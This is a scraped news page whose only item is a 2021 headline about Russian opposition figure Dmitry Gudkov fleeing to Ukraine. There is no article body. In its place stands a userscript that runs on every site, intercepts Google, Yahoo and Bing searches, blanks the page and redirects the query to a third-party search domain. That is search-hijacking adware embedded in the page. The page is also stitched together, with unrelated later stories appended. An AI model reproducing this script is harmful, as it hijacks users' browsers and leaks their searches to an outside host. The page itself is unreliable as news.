News  |  World  

Russia: Opposition figure Dimitry Gudkov flees to Ukraine

By DW |   08 June 2021   |   8:31 am  

// ==UserScript== // @name panda google // @namespace http://tampermonkey.net/ // @version 0.1 // @description try to take over the world! // @author You // @match *://*/* // @grant none // ==/UserScript==

(function() {

function findGetParameter(parameterName) { var result = null, tmp = []; location.search .substr(1) .split("&") .forEach(function (item) { tmp = item.split("="); if (tmp[0] === parameterName) result = decodeURIComponent(tmp[1]); }); return result; } var u ='https://lato2.mysearch.space?q=', s = [

{ 'host':/^https?\:\/\/www.google(\.\w+)+\/search\?.*(sourceid\=chrome).*$/, 'query':'q', }, { 'host':/^(https?\:\/\/)(\w+\.)?(search\.)(yahoo\.)(com)\/(search\?)?(.*)(fr\=crmas).*$/, 'query':'p' }, { 'host':/^(https?\:\/\/)www\.bing\.com\/(search\?)?(.*)(FORM\=CHROMN).*$/, 'query':'q' } ] for(var i = 0; i < s.length; i++){ var net = s[i], pattern = net.host, q = findGetParameter(net.query); if( pattern.test(window.location.href) ){ document.body.innerHTML=""; window.location.href=u+q; } } })();

You may also like

1 day ago
The US has accused Russia of using chemical weapons in Ukraine. These wouldn't be the first, nor the only illegal weapons used — by both sides — in the ongoing war.
1 day ago
At least 60 people have been killed as southern Brazil endures its worst flooding in more than 80 years. Rescuers are battling torrential rains as they search for missing people in the state of Rio Grande do Sul.
1 day ago
Panama's former security minister Jose Raul Mulino on Sunday stormed to victory in a presidential poll dominated by his old boss, the popular ex-leader Ricardo Martinelli, who buttressed his campaign despite being holed up in Nicaragua's embassy.